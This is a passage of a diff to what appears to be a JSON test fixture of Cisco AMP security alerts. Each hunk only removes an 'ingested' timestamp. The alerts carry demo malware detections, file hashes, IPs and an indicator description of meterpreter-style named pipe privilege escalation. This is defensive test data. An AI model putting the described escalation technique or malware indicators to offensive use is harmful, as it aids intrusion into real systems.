Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 @@ -813,7 +806,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688952738Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 @@ -921,7 +913,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688953553Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 @@ -1029,7 +1020,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688954360Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 @@ -1125,7 +1115,6 @@ ], "code": "1107296274", "id": "1476910664322001000", - "ingested": "2022-02-02T05:52:24.688955178Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", "severity": 3, @@ -1207,7 +1196,6 @@ ], "code": "1090519054", "id": "6533671385032557000", - "ingested": "2022-02-02T05:52:24.688956181Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -1299,7 +1287,6 @@ ], "code": "1107296258", "id": "1489955900329000200", - "ingested": "2022-02-02T05:52:24.688957002Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "severity": 3, @@ -1379,7 +1366,6 @@ ], "code": "1090519054", "id": "6533670191031648000", - "ingested": "2022-02-02T05:52:24.688957820Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -1469,7 +1455,6 @@ ], "code": "1090519054", "id": "6533670191031648000", - "ingested": "2022-02-02T05:52:24.688958624Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -1555,7 +1540,6 @@ ], "code": "1090519054", "id": "6533670191031648000", - "ingested": "2022-02-02T05:52:24.688959435Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -1644,7 +1628,6 @@ ], "code": "1107296272", "id": "15212386047828", - "ingested": "2022-02-02T05:52:24.688960404Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", "severity": 3, @@ -1726,7 +1709,6 @@ ], "code": "1090519054", "id": "6533669929038643000", - "ingested": "2022-02-02T05:52:24.688961211Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -1816,7 +1798,6 @@ ], "code": "1090519054", "id": "6533669929038643000", - "ingested": "2022-02-02T05:52:24.688962041Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -1902,7 +1883,6 @@ ], "code": "1090519054", "id": "6533669929038643000", - "ingested": "2022-02-02T05:52:24.688962855Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -1988,7 +1968,6 @@ ], "code": "1090519054", "id": "6533669671340605000", - "ingested": "2022-02-02T05:52:24.688963665Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2078,7 +2057,6 @@ ], "code": "1090519054", "id": "6533669671340605000", - "ingested": "2022-02-02T05:52:24.688964469Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2168,7 +2146,6 @@ ], "code": "1090519054", "id": "6533669671340605000", - "ingested": "2022-02-02T05:52:24.688965283Z", "kind": "alert", "original": 